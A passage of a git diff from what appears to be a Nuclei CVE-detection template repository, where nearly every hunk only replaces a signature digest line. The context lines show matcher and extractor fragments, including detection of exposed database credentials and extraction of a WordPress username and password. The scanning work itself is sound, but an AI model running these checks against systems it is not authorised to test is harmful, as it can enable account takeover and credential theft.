4a0a0047304502207981fd33b47b2ea08e3773031bc1697afdaa2229e139ea24ecce164932ce477f022100d50d0e46ca092e1f51545e32a3409c1cfb5c429cf21a41c05a5dfcc7b8876d5f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220082a5bc6bc3daaea30baed2fbc9ee7d404306ce7847ebe8318dccd6a2eb859f0022100f0fba589f7c4bda1acd61a673143576ee709954b98f0737fd99876171f386038:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index c50fa141e5..de1c2474bd 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -59,5 +59,4 @@ http: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx"' - -# digest: 4a0a00473045022100eebeed8993ec9541b97ec1b081155b2406483486cb2944eeebdcb7cb68385e1302204b20e3d37516d61582004c3981609e9ff9b38b5d7febd8d4dcbbd27786edf940:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022038effde0d34d3e9861c9a26d39f99c3e4c5917836173695abee020f0afd8c28402205013ef0b75edd32470d3e6f24835e6020f7c21cd0e795f351b40f5b862644810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 21b15aed3f..32ed5eeb3e 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -46,5 +46,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "") && contains(body_2, "Subnet masks")' condition: and - -# digest: 4a0a00473045022100bc7eac88f603719e73d4cdc92411558e4f5bf0af15110d4a4d4cf180b38d22de02200b635ae0a4971fb35fd0c0e6fb683cb3fed66d83b48044c79c0fa6a69cd609fc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fbf3a44832d89ed11fa2ef4bbd1cebebf5f348a031a4487599336a9841db8481022100ad0768641756c6a7be96b186b21b22173211ef27cf46c32c3d95beaaa0bf3bff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 80facb02c1..6cf86fad76 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022078f5fcc8ec49b187181757e11384f6df07cf0ef3f311895ff83705c73c4ea270022016a2118c8a89790c57f5d9c483106cf124b7dedfadbfad86bd24e686e437b87a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100faea3ab667fef1e0584f983555b8fcceb6513643bc301edd87323a0ebd406ab8022100c25fec687abc94498e551f4dfed088013de8cf5bc383ffdc73ebca02e20d91f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 04d5737858..108229c0d5 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' - -# digest: 4b0a0048304602210081843c94f1515ab2a94ccb04754cb6a75cce884bde9232bb87702e7132b8fc0d022100f6933de8fdb14f69ddb9fdb6724d33118b9686d0ce32e2a7fd65ef090fac4c0d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ea8501e8ce737827f4d2f4aa7ea534d93fb7927bcc33c595fddc8f3b315bae5f022046ee6051efaffa3e0e740bdabbd8b96a82bc9ff3aed04aa594c23adcb212c3cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 224f375427..be97ca042b 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203b721ec5d7ef128685e0dbe6b265ac95e4446c98f5f85627381be2e33e8dabb402203f8f4c83aa78c960a9541c1623c7577673fbb512c8e90265fcb3b7980081d343:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f975cbdf7754292bc2e941e3ffa036ac686ad726f9c3484709f6b8791a8411940220679be51e3bb37b8a32562dab71191dc44b618faafd4d726165b694b4b38a0eba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index f0a513b9c8..89312113e4 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009baecddb5ff04989e692df02409cc7ceb521b8e3d3b88658ed7967c8554e9c76022100894ae45e25fb0db01a3a851c47ce19446ec0736c58880aebf9a93c3060180783:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100df4c57ee23dc573b54fffeac2bb722dab5ea30cfa4dcde9f386c439146198af8022100e8ea60a971501bfc1a860b9a63bc5ff0df73aeb65c74af464c4d3e8b0e9ec6d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index e187540038..cdee507668 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -74,5 +74,4 @@ http: - 'FID,([aA-zZ_]+),' internal: true part: body_2 - -# digest: 490a004630440220223d1cccaca4dd6308c700004da8e9ff3c86aa8d9c33f1a5d741ebdbc118bb0c0220313d58cb97d3a415faf63d7e769aafcf675f1a98c0dc741380db861541fd6885:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022048b6cbf346b4adae9b2247d0a31c4be84338001a6ee8127b31f69e42340f88cf02207616ca1af623d35a79c1ff0fc515c8bad8cf04fcb8645cd63663ea6663767cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index c779a08d07..911b539d89 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ChurchCRM")' condition: and - -# digest: 4b0a00483046022100e0965edf62d8ea3e03c70d3dcd8d8eee9403d60f4e1fcc959147dc78fa7740bd0221008426ccbe0bdfec8939db718adfa0754b382c9e19dfe128e1f70f94b5ee50559f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210098fdbae193295f067bb8fdd2024384767a496b2bd0ffd66dcbe822fe865fbc8a022078ee840886270bffe2d877c2510684ae09ed165843392fb8134ae43b9bfd5298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 8b5b7ae6db..648072270e 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ab7a47a7ef3677930100ddcfb19e28145bb4b4bfc44013f0e44aec19657f092402201fb33e6f416c5310ace038e359c82a82a98df453e17aa436d230d6921538b43a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100afc504c641b0e5747bb133092c50f615f35d985803af6c7a9c7f799f0c62c6cd02207a853499a4744a3b91c852fd7517a532cfc7092414eecc570fcdfd30e9cea858:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 654ac8d0e6..4779e4b57c 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -41,5 +41,4 @@ http: - contains_all(to_lower(interactsh_request), 'user-agent','curl') - status_code_1 == 302 condition: and - -# digest: 4b0a004830460221008d7e2912fe8d311d1c4a4436f72b83bf395cfaec91e28af83e2b4be4a4e45276022100eef9faed9e7e102b85a956a51a379b64b745188f74178201ca2b0f18e6c35b93:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e998bf62c6242b7cb534a1a4b8c89478e0b6d750a99ccb41960261f02a69e9680220782d480ca17bc755e276258e80e3b232e11951055483e5231b70ac74523e53b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index fc491405de..a68d58da1a 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -49,5 +49,4 @@ http: - contains(body, 'Fax Trace Settings') - status_code == 200 condition: and - -# digest: 4b0a004830460221009bf9bd9c404d6ace1102d91d4d683f55e287dec7f6618e4de8160149bf76a716022100e704d082ec9595a7674183b77faaacf3895aa3472dd32914bed947e3a7d420ff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022018e64f04b09badb8479b0adde07bf3da23cfab7a1dc29c8c7c8a3b6c863bd85d022100dd524d1d4f3bb3fbd605a14c2b69c558080e530b490175a2dd2ae36f5e2ab0af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index 2f8ad77c43..a48a24f11c 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203c28baa8fbeba0d1434c68cc2cab8ab4c69c59535e2b4411a4e26d2c7bc1126902203e6862c2ce5324449c2c3c77e97f12648624d5d35b414226487f7fab90591aa0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c89bb7b5b5357499050746216bc246252d2336bafa134a5b9b2e82149c03cd55022100e6d424d01357d17cdc785ef7d0341ebdf7a3224555f4c4ff1cdda69968217995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index d08eb8a7e5..890ee8330c 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220150d57ac882ce75689471a2f1e7d5534037310bb9c7600abe84e3bb1a226a49c022076d6e3a320b7835f14f137d75565409754dff84a2fec6d8cec2414676ce037b4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b8275de346a0cc7d4d7477371c43a6ccef4ec844e06193653ce8357cef3a0a74022050842dba835ee765cd1cf2809ba29b1d2315d0a52e7d562ea9e65652e34be4de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index 27f6f57f63..6da43cdae8 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -52,5 +52,4 @@ http: part: header words: - "text/html" - -# digest: 4a0a0047304502202a8fa17a724408c474326bdb32f90e389532c42686259f0070982851e85a1936022100dd07d07f7387d9dddefe3e43d4e507cf362882eec15fb8b9bd6768e9c4df6da6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100eb36f46c928e27ff65f1736c0bd6c04984095aa013573b03160fbcd25550c9a2022100eb122b1e489dc911da5aa12ab595c3ed5451480ad7b82ee185d4335da54d5874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml index 42638c34d3..8a543b7052 100644 --- a/http/cves/2023/CVE-2023-2648.yaml +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -69,5 +69,4 @@ http: regex: - "([0-9]+)" internal: true - -# digest: 490a0046304402207dc5ce5ee58b4598333c56e3bc4f0e926a570cbbfffa54bf69c7d9bc0872e2f202205df063c257a77a1012cdee057b1905edfd64c730daea5cec3270405401d67a1f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201e0af1a2252145e892b2390a71548ec700c0e5d7a7e29c7e9daca4203c0b70a60220308be56bdba436f7d92ebb8179c2905e1126d053c70ca2bedd808f9017295822:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 3b880ca832..dddbfbe637 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -59,5 +59,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a0047304502202df0935ed1b57c84c250230e0d35b1b33b8fe344c7bcb282b06f63dd7d81e64d02210089678723a680e3b51396e36d5785d9185b56dee5eaf139e638f9a7e778d7cae1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008aea4f0a6615bb978d8d4947d02c1cb4b5759f89b84a2cb3416a85495dc67c5002204ad24c70bb8bcb6b90501ddb92390d47ac9fca63bcd00de703b19424e6543e22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 493c24344d..e1e0d53a08 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "ChurchCRM")' condition: and - -# digest: 4a0a00473045022100bec650f88c9b58e8cb539a665d3d5d1a0e98dd8086e253281901c1b4dc52bfd002206997ee2f74e5e9879fc359646e5f6fc1dbaf75dd0eaa3c5c9b4ba76414a55b05:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d34ca93a22daf5f2947709f01f34f7e8a3b773503433bb0ad68d6e211c413fe70220651ac025b4258b5973f810df734628a1a24d2ef25ab4a3cd7cbe0e8a1d808d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 27af47bf3b..8da36dda39 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100912e3a94707c4900cb8d13e86e6cd306fd5de94c9182a1e6599f11af3172e5240220110adc0b2e6b3d8c7878debf03a47e98da509fc063d85a1db5faeadf497c0416:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220571430709a77b59d7c608669b616189bf5914b2981559935e177fb41752d09a302202a938f76c9a326ab22e60803fb0f4f13dcda802ee38405f3b17d808d61af09a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 39837fa025..d797e91c10 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -77,5 +77,4 @@ http: - 'duration_1>=6' - 'contains(body_2, "Jms Blog")' condition: and - -# digest: 490a004630440220459e2e91d1754b9603224c3482f9f47df6fdd85e110d79372798d1b11bbdf07202206b46dfa277c2749bcc0a1cee364b1a0e06598e98397a77c327686ec5f5e2d788:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220632f260be6a04284aa6f06bc58909da7f9a30177f5f382307ece1a4f74f595d4022100a6445edb6165a05bfecee3c496c83f27c3a729fd64708670b743bf11550f37fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index a3cd51519a..8eff82a9ea 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -46,5 +46,4 @@ http: part: interactsh_request words: - "User-Agent: Appwrite-Server" - -# digest: 4a0a00473045022100e03bacdd433e552527110ed1d947fb35f045afba3b56c4c6cb5c32098ddf4d5102207242c86a6e80f8181eb5a1abe24d2289108055334998c7f4d601591ff6bd0cca:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022039b00b12839a572f14e27f895120d79558b88e69b7e66765af448b3da6799f3d022100f87b115d560546b49acbe366600f27392a55eaab5a75f919e383cef129e061fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index 3f907ba8fe..aa379d405c 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022020dcb903344bde7e9d55da88d69f5cd698f175314d935c044c33209fdb70b8d002207dfbc3e59e4bfae9a890ce535b4dec0871626e19ae5a8c6de7ed0e235aba2b61:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008cef00c543c49c3509d8cd700ae14955165c39646ccc9abc7426e63d44fbcf54022100ab5816a9b3e9f01e7d30be5183d7a7231c9784da5a45a9016245ea7d7a593309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index ee577b3bdb..89988a2c7a 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220791c8f2aa779bb972e0ae9cf0d7c8ea95d3f980e4a76958838cbb3683a7aa6b002202790a78995b6d81fbeb410323f8e84a3ebe436db87ce2b4e3abc1a1cc3199a6c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200f79422ebf0efcd3149dc486ec499426aa772a4873978a3412d5bcd6400b9cc7022100d5804362f432fc1b777fad16c15db305f8e91b72d197179c4871735ec025b073:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index a098d304e9..2e34bc941d 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100edca7b09c53071950b66ca0f0d1660eef9906845089c8e5d128912db013dfb4d0221008631603b2ef0103536e33440fb358fd3cf527829e3c169c00d76721137c188bb:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022027aec60cf6881c8508a77ca82a7128d62ae5f7401737fabafe38f894c7cc83b9022073293ca4cd38cda5a27c0d80616b07d68f6be5cc30a29b41e70a2bf64d553bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 8b5912fbd7..9dbee38393 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -69,5 +69,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body_2 - -# digest: 490a00463044022072db308c52c3e4343309e1860cbed7e246d0e9fc9464a0bd3e27ffd450a74afb02204546603b0d0b3c1d185da1b9aea6d9e420fe21bb7cc12dacc86ee17fdf76b8aa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dad7ebe28c45eef6e5cdd0195d7c8c3ff9b999f37fb0775c1b9fc94978650141022100b1788c8bc56dbad2de0f78117a9a74dbde889be211f42dd523437e8d1e9bdf53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index f1040503d6..63a3a88933 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -63,5 +63,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100924b266f94c6d5458734cebf7e82da19835ebb956d5075e5a15c34cacb659b8a02205c25d3b2b57a6b3cbe92524415ca0369fc98921c44c3b301c638662197dd9241:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202e706eba3c2028aa3e48bdfaf784a32178df4779eb8048cc3fcc382ef0d683310220032a85876c4f59f266df750e35ec7a5bcb8c3d25beeacf853918bb8e7342c788:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index b5f996df8f..de1a691eac 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -69,5 +69,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203009b21a993f5961f57f8a983f938ae75d6ad3ec4333564249a06b7ded80f690022100e9777ebae2ef4ea1a70b325066f74bed6c817c5aeae11df78ea57a66c725a4c4:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022038c2c0a07f735fc72400a767355267cfd59f3ed21f5afd475daea92c8db4862f02202411acce12dea68fa1a49efdf4251b1720b0860d3c871a2b9f978f4507216a45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index b8e8bba0fa..2d349083e4 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -60,5 +60,4 @@ http: - type: status status: - 500 - -# digest: 490a00463044022078e073cb99bdcb6192cdfe87fee8a146a597bea6826f3d6d28593e8ffd3877a9022006601662551793807b92536d0f37eedf72e0a88f2cb1a86e7b5cd436406ca07b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022023c277034a54cbb0a82860f50b1cbe3826ab56c5a2096e1aa29d07ffe2229b0d022062a776712553d0a9e62cc3101c52e3f8b5b5765be617126c9eb5d0eefa48b962:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index 40fcf19195..ab3db1e55b 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -39,5 +39,4 @@ http: - 'contains(header,"text/plain")' - 'contains_all(body, "sdbuser =","sdbpassword =")' condition: and - -# digest: 4a0a004730450221009a07cf4bc758c4b291b81dad7e37f788843c6911ef622b04cfdb34eafa65560c022029606a1e8894e3e23a5f3e4b40bed061de359e0b2b0ec7ecbe2aa2c3e602504e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b195257190c2c21a10bf8548301dfee390806a1f90e7c0b964ddb3ce611cbf1a022100ca27b53002f9257af3f092f023424923c140868f5d5e6b255e6c6ab671880b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2779.yaml b/http/cves/2023/CVE-2023-2779.yaml index 81ff2b6b75..10c32b79fa 100644 --- a/http/cves/2023/CVE-2023-2779.yaml +++ b/http/cves/2023/CVE-2023-2779.yaml @@ -48,5 +48,4 @@ http: - 'contains(header_2, "text/html")' - 'contains(body_2, "") && contains(body_2, "facebook_urls")' condition: and - -# digest: 4a0a00473045022100892187de4cab8c1bee0c11afa3b1c2990c996ebb5f5fb3bbbc1af134e0178bfa0220788a0f8181b1012e4f527175d63208435cb5cc35f81aa57dbd7c71f9faba8731:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b92efe5dae34665967c2eb3772e6e3fa399722cd096ecbf3b551f9bc51423aac02202319d3ea013d437d7a2f5f4576447ad638172a6f2ee1680ab3a9a46d86e3d39c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 08599c1d2d..3077a99df9 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -64,5 +64,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body - -# digest: 4a0a0047304502205c5a279b66f57e424b1e6bad5f6c9dfd17c42445934a1066e94d0cf7a0eed008022100affa3575620e995003669616ca58611d4d1560ab66abee0fc0784f5d1289774f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022048472964d44b29edb4d983ebd13c0d7465484b44c61676dc3191634b1c6253e6022100c07458a7cb2ccb44d3507ec24bb4a7249f825756562a9283fc086e38d1026de5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27922.yaml b/http/cves/2023/CVE-2023-27922.yaml index 3362c2a58b..3f3450cdcf 100644 --- a/http/cves/2023/CVE-2023-27922.yaml +++ b/http/cves/2023/CVE-2023-27922.yaml @@ -49,5 +49,4 @@ http: - 'contains(tolower(body_2), "_newsletter_")' - 'contains(body_2, ">")' condition: and - -# digest: 490a0046304402205304e7abd3c9cacf38e579b72b0bfae31ddf10327f02f8125b09e3fe77da63290220099136611a0ea99637fc2f55888b33dcb1cba2c0c4226a9f5e09d57517ef9a3d:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203e790f156134d363c1ca8f69dac5bdbafc85b88a8386421ddb10913507bef70e022053e95654cad9048a8cd7a23a3815801c3f3d34b174819c85382d328903a2c7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 871da0b99d..de6b236041 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100aea47b65502017df64482975b3be775081d30a3d6801747251fb1160eb615e8d02207bc65f039b915e80b58b7873e11ea581663d7bdda2478bbc7f591d4064bc358e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d2eeb8eb942b1c5e7b24898bee1239cfd4ce5424abbce90198d3e037c39a34d902206de696f30369dd83dd193197e9e27f8f05cbc3f9fdbf86f25748da477e42384a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 57e2ebfd1e..4c483f7643 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -70,5 +70,4 @@ http: dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' - -# digest: 4a0a004730450221009e9b54ad97a8771de07824b8078586d324929f73b68b7bb59e12c605e4dc8a8902202edda0ad0f2979f01326a73d9f8dbea285a5fa364de0de34c7e6560dfdb170d2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b0c86b2390a5c962500220823b6bbb3c58096d8d15400cc4e4ebda1b24a53db102204505a0ffebe9cb5b20debf8bf2ff7bc0b2b4eb188d2696c7135fd3a6b04756e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index 7776b6b8ae..cce344041e 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205a60e069c8063426297ffe1b545d6fc761c1bbf31034c0b42aef3c230501e966022100e06ddb51583224caeb53df2f13ed50bd06de35373491ed7f518f9329fadbe146:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202ef9f4d3309cccac474624676f4110e1ece891626e3579b0a3ede6f0b3bb70d90221009b7b1444950417ba9273be117db7ee5e0ff49c08d7178f241ae981500fe4f2cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 3a89ebb40f..59d2407e90 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022010dca2e2e5f9f4643be37d0ea594cc97dadf7b8db3817885f9cadc9b2a8f44e0022100ec4415ac7045552f7fcb6fb680c2d978c36586e94a05d0aa7b50313aad7ab401:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f1f1352910b4116c58b51908e904757db4cc6806a82a6e4496361bb27d62e3d902202fd206f04964cca243950e2f1832ffbc3d9a367a83b153889ef147c38a24075c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index fc0558c0d2..fb9eb1a24f 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -211,5 +211,4 @@ http: - '"url":"\/uploads\/([0-9a-z]+)\/' internal: true part: body - -# digest: 4b0a00483046022100f4a2481f659ba6187535a6da9c41a37666bb1fb07c370a266adfbba3abb9a0a30221009a5634ca4e910ca8ea89f14df8dff2b9f8c3b44835be68d91b45c4bd7ba6b3a0:922c64590222798bb761d5b6d8e72950 +# digest: 